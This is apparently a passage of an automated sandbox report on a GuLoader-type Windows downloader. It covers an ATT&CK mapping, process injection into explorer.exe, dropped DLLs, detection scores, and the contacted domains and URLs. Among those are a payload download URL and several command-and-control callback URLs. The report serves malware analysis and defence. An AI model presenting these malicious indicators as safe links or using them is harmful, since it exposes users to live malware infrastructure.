        Source: Yara matchFile source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Rootkit        		1
        Credential API Hooking        		221
        Security Software Discovery        		Remote Services1
        Credential API Hooking        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts1
        Shared Modules        		Boot or Logon Initialization Scripts512
        Process Injection        		12
        Virtualization/Sandbox Evasion        		LSASS Memory12
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Clipboard Data        		Automated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
        Process Injection        		NTDS2
        File and Directory Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer113
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets4
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common3
        Obfuscated Files or Information        		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Rundll32        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        File Deletion        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625008 Sample: aSsc9zh1ex.exe Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 38 www.rnrr.xyz 2->38 40 www.thebeautystore.store 2->40 42 20 other IPs or domains 2->42 60 Snort IDS alert for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 70 6 other signatures 2->70 11 aSsc9zh1ex.exe 24 2->11         started        signatures3 66 Performs DNS queries to domains with low reputation 38->66 68 Tries to resolve many domain names, but no domain seems valid 40->68 process4 file5 30 C:\Users\...\wxbase30u_xml_gcc_custom.dll, PE32+ 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 34 C:\Users\user\AppData\...\AsSQLHelper.dll, PE32+ 11->34 dropped 36 C:\Users\user\...\AEGISIIINVHelper.dll, PE32+ 11->36 dropped 80 Tries to detect Any.run 11->80 15 aSsc9zh1ex.exe 6 11->15         started        signatures6 process7 dnsIp8 50 barsam.com.au 203.170.86.89, 49758, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 15->50 52 Modifies the context of a thread in another process (thread injection) 15->52 54 Tries to detect Any.run 15->54 56 Maps a DLL or memory area into another process 15->56 58 2 other signatures 15->58 19 explorer.exe 15->19 injected signatures9 process10 dnsIp11 44 www.fungismartgrid.com 41.203.18.177, 49768, 80 xneeloZA South Africa 19->44 46 herbalsfixng.xyz 192.64.117.165, 49773, 80 NAMECHEAP-NETUS United States 19->46 48 4 other IPs or domains 19->48 72 System process connects to network (likely due to code injection or exploit) 19->72 23 rundll32.exe 19->23         started        signatures12 process13 signatures14 74 Self deletion via cmd delete 23->74 76 Modifies the context of a thread in another process (thread injection) 23->76 78 Maps a DLL or memory area into another process 23->78 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        aSsc9zh1ex.exe38%VirustotalBrowse
        aSsc9zh1ex.exe14%MetadefenderBrowse
        aSsc9zh1ex.exe34%ReversingLabsWin32.Downloader.GuLoader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        14.2.rundll32.exe.4b7f840.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        14.2.rundll32.exe.28e0a58.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://powerpoint.office.comeu0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%Avira URL Cloudsafe
        http://barsam.com.au/bin_QuCucbUMda229.bin?0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://barsam.com.au/bin_QuCucbUMda229.bin0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.intelios.xyz/wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN0%Avira URL Cloudsafe
        http://www.threads34.store/wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        https://sectigo.com/CPS0C0%Avira URL Cloudsafe
        http://barsam.com.au/bin_QuCucbUMda229.bing0%Avira URL Cloudsafe
        www.shantelleketodietofficial.site/wn19/0%Avira URL Cloudsafe
        http://www.nelvashop.com/wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH0%Avira URL Cloudsafe
        http://www.herbalsfixng.xyz/wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
        https://word.office.com-C0%Avira URL Cloudsafe
        http://www.fungismartgrid.com/wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.schnellekreditfinanz.com/wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN0%Avira URL Cloudsafe
        http://crl3.d0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.intelios.xyz
        		3.64.163.50
        		truetrue
          		unknown
          herbalsfixng.xyz
          		192.64.117.165
          		truetrue
            		unknown
            schnellekreditfinanz.com
            		68.65.122.211
            		truetrue
              		unknown
              www.fungismartgrid.com
              		41.203.18.177
              		truetrue
                		unknown
                barsam.com.au
                		203.170.86.89
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    www.kbcoastalproperties.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.sura.ooo
                      		unknown
                      		unknowntrue
                        		unknown
                        www.shantelleketodietofficial.site
                        		unknown
                        		unknowntrue
                          		unknown
                          www.threads34.store
                          		unknown
                          		unknowntrue
                            		unknown
                            www.taakyif.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.schnellekreditfinanz.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.hokasneakeruse.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.perrobravostudio.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.reionsbank.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.nelvashop.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.rnrr.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.ayanaslifeinmalaysia.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.thebeautystore.store
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.herbalsfixng.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.gpusforfun.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.liesdevocalist.store
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://barsam.com.au/bin_QuCucbUMda229.bintrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.intelios.xyz/wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnNtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.threads34.store/wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cHtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    www.shantelleketodietofficial.site/wn19/true
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.nelvashop.com/wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cHtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.herbalsfixng.xyz/wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnNtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fungismartgrid.com/wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnNtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.schnellekreditfinanz.com/wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnNtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000A.00000000.42071929978.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003053261.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41937972149.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42204206643.0000000011F59000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://powerpoint.office.comeuexplorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ocsp.sectigo.com0aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://barsam.com.au/bin_QuCucbUMda229.bin?aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://android.notify.windows.com/iOSGexplorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://excel.office.comexplorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDaSsc9zh1ex.exe, 00000007.00000001.41771391088.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
                                                              		high
                                                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.microexplorer.exe, 0000000A.00000000.42052359302.000000000ACF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42166284768.0000000003850000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42185468524.000000000B590000.00000002.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.gopher.ftp://ftp.aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdaSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://sectigo.com/CPS0CaSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://barsam.com.au/bin_QuCucbUMda229.bingaSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.msn.com/en-us/news/politics/graham-tries-texplorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://word.office.comexplorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0saSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://nsis.sf.net/NSIS_ErrorErroraSsc9zh1ex.exefalse
                                                                            		high
                                                                            http://www.foreca.comexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://word.office.com-Cexplorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://outlook.comexplorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppfexplorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppeexplorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/odirmOexplorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://wns.windows.com/).dlllexplorer.exe, 0000000A.00000000.42178218225.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42044824183.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41977721414.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41915362691.0000000009E02000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://api.msn.com:443/v1/news/Feed/Windows?Microsoftexplorer.exe, 0000000A.00000000.41928581843.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41992887926.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42192948449.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42061047062.000000000DA0B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdaSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://api.msn.com/explorer.exe, 0000000A.00000000.42058504298.000000000D826000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://windows.msn.com:443/shellexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
